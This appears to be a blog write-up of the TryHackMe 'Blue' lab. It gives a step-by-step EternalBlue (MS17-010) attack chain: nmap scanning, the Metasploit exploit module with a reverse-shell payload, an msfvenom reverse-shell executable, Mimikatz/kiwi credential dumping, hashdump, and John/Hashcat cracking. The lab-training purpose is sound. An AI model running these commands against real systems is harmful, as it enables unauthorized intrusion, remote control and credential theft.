THM EternalBlue Write-Up

Mohamed Ali
3 min read · Jul 21, 2024


Deploy & hack into a Windows machine, leveraging common misconfiguration issues.

Find This Room: Blue

What Is EternalBlue

EternalBlue is an exploit for a flaw in Microsoft's SMBv1 (Server Message Block version 1) implementation, CVE-2017-0144, which Microsoft patched in March 2017 as MS17-010. A crafted SMB request corrupts memory in the kernel driver srv.sys and gives an unauthenticated attacker remote code execution as SYSTEM.

The flaw affected every unpatched Windows version from XP / Server 2003 (patched out of band) through Windows 10 / Server 2016; the Blue room target is a Windows 7 machine. Within two months of the patch the exploit was used by the WannaCry ransomware worm (May 2017) and shortly afterwards by NotPetya.

1- Recon

Identify the target:
Note the IP address of the machine you deployed; every command below takes it as <target_ip>.

OS:
Knowing the operating system and its patch level tells you which exploit applies and which payload architecture (x86 or x64) to pick.

nmap does both port and OS discovery; netcat is enough for a quick banner grab on a single port.

SMB port analysis
Port scanning using nmap

Determine port status:

nmap -p 445 <target_ip>

Full scan :

To look for additional details, you can scan all ports and see what services and applications are running on the device.

nmap -p 1-65535 -T4 -A -v <target_ip>

Options:

-p 1-65535: scan all TCP ports (-p- is the shorthand).
-T4: faster timing template; fine on a lab box, noisy on a monitored network.
-A: enable OS detection, version detection, default NSE scripts and traceroute.
-v: verbose output.

What you are looking for is 445/tcp open (microsoft-ds) together with the OS guess. An open port only tells you the SMB service is listening, not whether the MS17-010 patch is missing; that is the next step.

Verify the vulnerability
Use Metasploit

Select the appropriate tool:
Open the Metasploit console and use the exploit/windows/smb/ms17_010_eternalblue module. Its check command (and, outside Metasploit, nmap's smb-vuln-ms17-010 NSE script) confirms that MS17-010 is missing without firing the exploit. That matters here: the exploit is a kernel memory-corruption bug, and a failed attempt can crash the target.

2- Gain Access

Start Metasploit

msfconsole

Select the module and set the options we will run against the machine. LHOST is your own address (on TryHackMe the tun0 VPN address, not your LAN address) and RHOSTS is the target. The room uses the staged x64 command-shell payload:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <Target_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <Your_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/shell/reverse_tcp

Vulnerability verification:

Check whether the device is vulnerable before exploiting it (example target 192.168.1.10):

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 192.168.1.10:445 - The target is vulnerable.

Implementation of exploitation:

If the check reports the target vulnerable, run the exploit to get a shell:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

The module grooms the kernel pool and is not fully reliable: if it reports a failure, or the target blue-screens and reboots, wait for it to come back and run exploit again with the same options rather than changing them. A successful run returns a command shell as NT AUTHORITY\SYSTEM.

3- Escalate

The shell EternalBlue returns already runs as NT AUTHORITY\SYSTEM, so this task is really about upgrading the bare command shell to a Meterpreter session, which gives you process migration, hashdump and the kiwi (Mimikatz) extension.

Background the shell you just got (CTRL + Z, then answer y).

Convert a command shell to a Meterpreter shell in Metasploit

1- Using the sessions -u Command:

  • After gaining a shell session on the target machine, you can use the sessions command to upgrade it to a Meterpreter session. First, list your active sessions to find the session ID:
sessions

Once you have the session ID (e.g., 1), run the following command to upgrade the shell session to Meterpreter. The original shell stays open and a second, Meterpreter, session is created:

sessions -u 1

2- Using the shell_to_meterpreter Post-Exploit Module:

  • sessions -u is a shortcut for this post module. Load it and set the session ID you want to upgrade (run and exploit are interchangeable in msfconsole):
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

The module selects a Meterpreter payload for the target platform and stages it through the existing shell. Once the new session is up, confirm with getuid that you are still SYSTEM and migrate into a stable SYSTEM process (pick one from ps) before running credential tools; kiwi in particular needs a 64-bit SYSTEM process on a 64-bit target.

3- Manual Payload Injection:

  • If you prefer a more hands-on approach, generate a Meterpreter executable with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > meterpreter.exe

Start a listener first (exploit/multi/handler with the same payload, LHOST and LPORT), then transfer the file to the target through your command shell and execute it to get the Meterpreter session. This payload is 32-bit; on a 64-bit target use windows/x64/meterpreter/reverse_tcp or migrate into a 64-bit process afterwards.

4- Cracking

1- Fetch saved passwords in Windows
Using Mimikatz (kiwi) with Meterpreter

Load Mimikatz into the session:
Meterpreter ships Mimikatz as the kiwi extension (the older load mimikatz extension has been removed). It reads LSASS memory, so the session must run as SYSTEM and, on a 64-bit target, inside a 64-bit process; migrate first if getuid or sysinfo says otherwise.

meterpreter > load kiwi

Run raw Mimikatz commands:

kiwi_cmd passes a command string straight to Mimikatz. The example below lists the current Kerberos tickets and writes them out as .kirbi files; it does not return passwords.

meterpreter > kiwi_cmd kerberos::list /export

Extract passwords:

creds_all dumps every credential type kiwi knows (msv NTLM hashes, wdigest, kerberos, tspkg). On an unpatched Windows 7 box wdigest still keeps the cleartext password in LSASS, so this usually prints the logged-on users' passwords directly.

meterpreter > creds_all

Use post/windows/gather/hashdump

Select the session:
With the Meterpreter session backgrounded, run the hashdump post module against it. It reads the SAM through the registry and also needs SYSTEM:

msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run

Each output line is user:RID:LM hash:NT hash:::. An LM field of aad3b435b51404eeaad3b435b51404ee means LM storage is off (the default since Vista); an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty password, typically a disabled Guest account.

2- Crack password hashes

NT hashes are not encrypted, so they cannot be decrypted: the hash is an unsalted MD4 of the UTF-16LE password, and "cracking" means hashing candidate passwords until one matches.

Use John the Ripper

Install John the Ripper:
Make sure John the Ripper is installed (the jumbo build has the NT format).

Save hashes to a file:
Paste the hashdump lines into a text file such as hashes.txt; John reads the pwdump format directly and keeps the usernames.

Run John the Ripper:
Crack with a wordlist and the NT format; afterwards --show prints the cracked pairs.

john --format=NT --wordlist=/path/to/wordlist.txt hashes.txt

Use Hashcat

Install Hashcat:
Make sure Hashcat is installed.

Run Hashcat:
Mode 1000 is NTLM (the NT hash) and -a 0 is a straight wordlist attack. Hashcat expects one bare NT hash per line, so either put only the fourth field of each hashdump line into hashes.txt, or keep user:hash lines and add --username.

hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt

Happy Hacking

Follow me:

Support

patreon.com/mosec
